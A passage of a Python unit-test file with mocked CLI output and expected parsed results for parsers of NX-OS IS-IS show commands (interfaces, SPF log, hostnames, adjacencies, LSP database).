"fwdng": "UP",
"ipv4_mt": "DN",
"ipv4_cfg": "yes",
"ipv6_mt": "DN",
"ipv6_cfg": "yes"
}
}
},
"2": {
"level": {
"1": {
"metric": "40",
"metric_cfg": "no",
"fwdng": "UP",
"ipv4_mt": "DN",
"ipv4_cfg": "no",
"ipv6_mt": "DN",
"ipv6_cfg": "yes"
},
"2": {
"metric": "40",
"metric_cfg": "no",
"fwdng": "UP",
"ipv4_mt": "DN",
"ipv4_cfg": "no",
"ipv6_mt": "DN",
"ipv6_cfg": "yes"
}
}
}
}
}
}
}
}
}
}
}
golden_output1 = {'execute.return_value': '''\
show isis interface
IS-IS process: test VRF: default
Ethernet1/1, Interface status: protocol-up/link-up/admin-up
IP address: 10.5.7.7, IP subnet: 10.5.7.0/24
IPv6 address:
2001:db8:10:5:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:5::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1
BFD IPv6 is locally disabled for Interface Ethernet1/1
MTR is enabled
Passive level: level-1-2
LSP interval: 33 ms, MTU: 1500
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 Inactive
2 40 40 10 Inactive 10 3 Inactive
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 0000.0000.0000.00 2w2d
2 0 0 64 0000.0000.0000.00 2w2d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP DN yes DN yes
1 2 40 no UP DN no DN yes
2 0 40 no UP DN yes DN yes
2 2 40 no UP DN no DN yes
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisInterface(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisInterface(device=self.device)
parsed_output = obj.parse(vrf='default')
self.assertEqual(parsed_output, self.golden_parsed_output)
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowIsisInterface(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output1)
class TestShowIsisSpfLogDetail(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'topology': {
'0': {
'total_num_of_spf_calc': 362685,
'log_entry': {
'current': 20,
'max': 20,
},
'entrys': {
'01': {
'ago': '00:01:23',
'date': 'Tue Oct 22 18:33:26 2019',
'level': {
1: {
'instance': '0x0002C453',
'init': 0.000728,
'spf': 0.000813,
'is_update': 0.00016,
'urib_update': 0.00052,
'total': 0.002374,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
'02': {
'ago': '00:01:18',
'date': 'Tue Oct 22 18:33:31 2019',
'level': {
2: {
'instance': '0x0002C458',
'init': 0.000878,
'spf': 0.000771,
'is_update': 0.000127,
'urib_update': 0.000375,
'total': 0.002283,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
},
},
'2': {
'total_num_of_spf_calc': 362754,
'log_entry': {
'current': 4,
'max': 4,
},
'entrys': {
'01': {
'ago': '00:01:20',
'date': 'Tue Oct 22 18:33:29 2019',
'level': {
1: {
'instance': '0x0002C476',
'init': 0.000681,
'spf': 0.001235,
'is_update': 0.000155,
'urib_update': 0.000713,
'total': 0.002985,
'node': 4,
'count': 5,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
'02': {
'ago': '00:01:17',
'date': 'Tue Oct 22 18:33:32 2019',
'level': {
2: {
'instance': '0x0002C47A',
'init': 0.000891,
'spf': 0.00138,
'is_update': 0.000291,
'urib_update': 0.00053,
'total': 0.003275,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
'03': {
'ago': '00:01:12',
'date': 'Tue Oct 22 18:33:37 2019',
'level': {
1: {
'instance': '0x0002C477',
'init': 0.001086,
'spf': 0.000931,
'is_update': 0.0002,
'urib_update': 0.001112,
'total': 0.003581,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.115',
},
},
},
'04': {
'ago': '00:01:09',
'date': 'Tue Oct 22 18:33:40 2019',
'level': {
2: {
'instance': '0x0002C47B',
'init': 0.001284,
'spf': 0.001047,
'is_update': 0.000209,
'urib_update': 0.000336,
'total': 0.003068,
'node': 4,
'count': 6,
'changed': 0,
'reason': 'New adj R2_xr on Ethernet1/1.115',
},
},
},
},
},
},
},
'VRF1': {
'topology': {
'0': {
'total_num_of_spf_calc': 361971,
'log_entry': {
'current': 3,
'max': 3,
},
'entrys': {
'01': {
'ago': '00:01:24',
'date': 'Tue Oct 22 18:33:25 2019',
'level': {
2: {
'instance': '0x0002C2F5',
'init': 0.000793,
'spf': 0.000268,
'is_update': 7.8e-05,
'urib_update': 0.000395,
'total': 0.001709,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'02': {
'ago': '00:01:19',
'date': 'Tue Oct 22 18:33:30 2019',
'level': {
1: {
'instance': '0x0002C2EC',
'init': 0.000547,
'spf': 0.000655,
'is_update': 9.9e-05,
'urib_update': 0.000507,
'total': 0.001968,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'03': {
'ago': '00:01:15',
'date': 'Tue Oct 22 18:33:34 2019',
'level': {
2: {
'instance': '0x0002C2F6',
'init': 0.000728,
'spf': 0.0002,
'is_update': 6.3e-05,
'urib_update': 0.000298,
'total': 0.001445,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
},
},
'2': {
'total_num_of_spf_calc': 362019,
'log_entry': {
'current': 3,
'max': 3,
},
'entrys': {
'01': {
'ago': '00:01:25',
'date': 'Tue Oct 22 18:33:24 2019',
'level': {
2: {
'instance': '0x0002C305',
'init': 0.000499,
'spf': 0.000217,
'is_update': 6.4e-05,
'urib_update': 0.000208,
'total': 0.001116,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'02': {
'ago': '00:01:21',
'date': 'Tue Oct 22 18:33:29 2019',
'level': {
1: {
'instance': '0x0002C30C',
'init': 0.001635,
'spf': 0.000398,
'is_update': 8.3e-05,
'urib_update': 0.000547,
'total': 0.002902,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
'03': {
'ago': '00:01:16',
'date': 'Tue Oct 22 18:33:33 2019',
'level': {
2: {
'instance': '0x0002C306',
'init': 0.000615,
'spf': 0.000236,
'is_update': 6.4e-05,
'urib_update': 0.000219,
'total': 0.001268,
'node': 2,
'count': 3,
'changed': 0,
'reason': 'New adj R1_xe on Ethernet1/2.415',
},
},
},
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis spf-log detail vrf all
IS-IS Process: test SPF information VRF: default
SPF log for Topology 0
Total number of SPF calculations: 362685
Log entry (current/max): 20/20
Log entry: 01, Ago: 00:01:23, Date: Tue Oct 22 18:33:26 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C453 0.000728 0.000813 0.000160 0.000520 0.002374
Level Node Count Changed Reason
1 4 6 0 New adj R2_xr on Ethernet1/1.115
Log entry: 02, Ago: 00:01:18, Date: Tue Oct 22 18:33:31 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C458 0.000878 0.000771 0.000127 0.000375 0.002283
Level Node Count Changed Reason
2 4 6 0 New adj R1_xe on Ethernet1/2.115
SPF log for Topology 2
Total number of SPF calculations: 362754
Log entry (current/max): 4/4
Log entry: 01, Ago: 00:01:20, Date: Tue Oct 22 18:33:29 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C476 0.000681 0.001235 0.000155 0.000713 0.002985
Level Node Count Changed Reason
1 4 5 0 New adj R2_xr on Ethernet1/1.115
Log entry: 02, Ago: 00:01:17, Date: Tue Oct 22 18:33:32 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C47A 0.000891 0.001380 0.000291 0.000530 0.003275
Level Node Count Changed Reason
2 4 6 0 New adj R1_xe on Ethernet1/2.115
Log entry: 03, Ago: 00:01:12, Date: Tue Oct 22 18:33:37 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C477 0.001086 0.000931 0.000200 0.001112 0.003581
Level Node Count Changed Reason
1 4 6 0 New adj R1_xe on Ethernet1/2.115
Log entry: 04, Ago: 00:01:09, Date: Tue Oct 22 18:33:40 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C47B 0.001284 0.001047 0.000209 0.000336 0.003068
Level Node Count Changed Reason
2 4 6 0 New adj R2_xr on Ethernet1/1.115
IS-IS Process: test SPF information VRF: VRF1
SPF log for Topology 0
Total number of SPF calculations: 361971
Log entry (current/max): 3/3
Log entry: 01, Ago: 00:01:24, Date: Tue Oct 22 18:33:25 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C2F5 0.000793 0.000268 0.000078 0.000395 0.001709
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 02, Ago: 00:01:19, Date: Tue Oct 22 18:33:30 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C2EC 0.000547 0.000655 0.000099 0.000507 0.001968
Level Node Count Changed Reason
1 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 03, Ago: 00:01:15, Date: Tue Oct 22 18:33:34 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C2F6 0.000728 0.000200 0.000063 0.000298 0.001445
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
SPF log for Topology 2
Total number of SPF calculations: 362019
Log entry (current/max): 3/3
Log entry: 01, Ago: 00:01:25, Date: Tue Oct 22 18:33:24 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C305 0.000499 0.000217 0.000064 0.000208 0.001116
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 02, Ago: 00:01:21, Date: Tue Oct 22 18:33:29 2019
Level Instance Init SPF IS Update URIB Update Total
1 0x0002C30C 0.001635 0.000398 0.000083 0.000547 0.002902
Level Node Count Changed Reason
1 2 3 0 New adj R1_xe on Ethernet1/2.415
Log entry: 03, Ago: 00:01:16, Date: Tue Oct 22 18:33:33 2019
Level Instance Init SPF IS Update URIB Update Total
2 0x0002C306 0.000615 0.000236 0.000064 0.000219 0.001268
Level Node Count Changed Reason
2 2 3 0 New adj R1_xe on Ethernet1/2.415
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisSpfLogDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisSpfLogDetail(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output,self.golden_parsed_output)
class TestShowIsisHostname(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'VRF1': {
'hostname_db': {
'hostname': {
'3333.3333.3333': {
'hostname': 'R3_nx',
'level': [1],
'local_router': True,
},
},
},
},
'default': {
'hostname_db': {
'hostname': {
'1111.1111.1111': {
'hostname': 'R1_ios',
'level': [1],
},
'2222.2222.2222': {
'hostname': 'R2_xr',
'level': [1],
},
'3333.3333.3333': {
'hostname': 'R3_nx',
'level': [1],
'local_router': True,
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis hostname vrf all
IS-IS Process: test dynamic hostname table VRF: default
Level System ID Dynamic hostname
1 1111.1111.1111 R1_ios
1 2222.2222.2222 R2_xr
1 3333.3333.3333* R3_nx
IS-IS Process: test dynamic hostname table VRF: VRF1
Level System ID Dynamic hostname
1 3333.3333.3333* R3_nx
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisHostname(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisHostname(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output,self.golden_parsed_output)
class TestShowIsisHostnameDetail(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'VRF1': {
'hostname_db': {
'hostname': {
'1111.1111.1111': {
'hostname': 'R1_ios',
'level': [1],
},
'2222.2222.2222.00-00': {
'hostname': 'R2',
'level': [2],
},
'3333.3333.3333': {
'hostname': 'R3_nx',
'level': [1],
'local_router': True,
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
'level': [1, 2],
'local_router': True,
},
},
},
},
'default': {
'hostname_db': {
'hostname': {
'2222.2222.2222.00-00': {
'hostname': 'R2',
'level': [2],
},
'3333.3333.3333.00-00': {
'hostname': 'R3',
'level': [1, 2],
},
'4444.4444.4444.00-00': {
'hostname': 'R4',
'level': [1],
},
'5555.5555.5555.00-00': {
'hostname': 'R5',
'level': [1, 2],
},
'6666.6666.6666.00-00': {
'hostname': 'R6',
'level': [1],
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
'level': [1, 2],
'local_router': True,
},
'8888.8888.8888.00-00': {
'hostname': 'R8',
'level': [2],
},
'9999.9999.9999.00-00': {
'hostname': 'R9',
'level': [2],
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
IS-IS Process: test dynamic hostname table VRF: default
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 3333.3333.3333.00-00 R3
2 3333.3333.3333.00-00 R3
1 4444.4444.4444.00-00 R4
1 5555.5555.5555.00-00 R5
2 5555.5555.5555.00-00 R5
1 6666.6666.6666.00-00 R6
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
2 8888.8888.8888.00-00 R8
2 9999.9999.9999.00-00 R9
IS-IS Process: test dynamic hostname table VRF: VRF1
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
1 1111.1111.1111 R1_ios
1 3333.3333.3333* R3_nx
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisHostnameDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisHostnameDetail(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output,self.golden_parsed_output)
class TestShowIsisAdjacency(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'interfaces': {
'Ethernet1/1.115': {
'adjacencies': {
'R2_xr': {
'neighbor_snpa': {
'fa16.3e44.0679': {
'level': {
1: {
'hold_time': '00:00:09',
'state': 'UP',
},
2: {
'hold_time': '00:00:07',
'state': 'UP',
},
},
},
},
},
},
},
'Ethernet1/2.115': {
'adjacencies': {
'R1_ios': {
'neighbor_snpa': {
'fa16.3e0e.fd03': {
'level': {
1: {
'hold_time': '00:00:07',
'state': 'UP',
},
2: {
'hold_time': '00:00:10',
'state': 'UP',
},
},
},
},
},
},
},
},
},
'VRF1': {
'interfaces': {
'Ethernet1/1.415': {
'adjacencies': {
'2222.2222.2222': {
'neighbor_snpa': {
'fa16.3e44.0679': {
'level': {
1: {
'hold_time': '00:00:32',
'state': 'INIT',
},
2: {
'hold_time': '00:00:24',
'state': 'INIT',
},
},
},
},
},
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis adjacency vrf all
IS-IS process: test VRF: default
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R2_xr fa16.3e44.0679 1 UP 00:00:09 Ethernet1/1.115
R2_xr fa16.3e44.0679 2 UP 00:00:07 Ethernet1/1.115
R1_ios fa16.3e0e.fd03 1 UP 00:00:07 Ethernet1/2.115
R1_ios fa16.3e0e.fd03 2 UP 00:00:10 Ethernet1/2.115
IS-IS process: test VRF: VRF1
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
2222.2222.2222 fa16.3e44.0679 1 INIT 00:00:32 Ethernet1/1.415
2222.2222.2222 fa16.3e44.0679 2 INIT 00:00:24 Ethernet1/1.415
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsisAdjacency(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsisAdjacency(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowIsisDatabaseDetail(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'level_db': {
1: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CD',
'checksum': '0xAD22',
'lifetime': 1199,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C9',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.01-00': {
'lsp_id': 'R1_xe.01-00',
'sequence': '0x000007C7',
'checksum': '0x14CA',
'lifetime': 846,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C7',
'checksum': '0x0D6A',
'lifetime': 852,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R2_xr.00-00': {
'lsp_id': 'R2_xr.00-00',
'sequence': '0x000007C5',
'checksum': '0x94D6',
'lifetime': 887,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007BD',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'ip_address': '10.16.2.2',
'extended_ip': {
'10.16.2.2/32': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'hostname': 'R2_xr',
'length': 5,
'ipv6_address': '2001:2:2:2::2',
'mt_ipv6_prefix': {
'2001:2:2:2::2/128': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'extended_is_neighbor': {
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
},
},
'mt_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
'topo_id': 2,
},
},
'digest_offset': 0,
},
'R2_xr.03-00': {
'lsp_id': 'R2_xr.03-00',
'sequence': '0x000007C6',
'checksum': '0x86AC',
'lifetime': 594,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C5',
'extended_is_neighbor': {
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B05',
'checksum': '0x7FA7',
'lifetime': 653,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B05',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 40,
},
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
2: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007C9',
'checksum': '0xBB89',
'lifetime': 1087,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C4',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 20,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 20,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.01-00': {
'lsp_id': 'R1_xe.01-00',
'sequence': '0x000007C0',
'checksum': '0x3A34',
'lifetime': 1137,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007BF',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C8',
'checksum': '0x23DB',
'lifetime': 867,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C7',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R2_xr.00-00': {
'lsp_id': 'R2_xr.00-00',
'sequence': '0x000007D1',
'checksum': '0xE002',
'lifetime': 813,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C9',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'ip_address': '10.16.2.2',
'extended_ip': {
'10.16.2.2/32': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.36.3.3/32': {
'metric': 11,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 20,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'hostname': 'R2_xr',
'length': 5,
'ipv6_address': '2001:2:2:2::2',
'mt_ipv6_prefix': {
'2001:2:2:2::2/128': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:3:3:3::3/128': {
'metric': 11,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 20,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 10,
},
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.01': {
'neighbor_id': 'R1_xe.01',
'metric': 10,
'topo_id': 2,
},
},
'digest_offset': 0,
},
'R2_xr.03-00': {
'lsp_id': 'R2_xr.03-00',
'sequence': '0x000007C2',
'checksum': '0x8EA8',
'lifetime': 784,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C1',
'extended_is_neighbor': {
'R2_xr.00': {
'neighbor_id': 'R2_xr.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
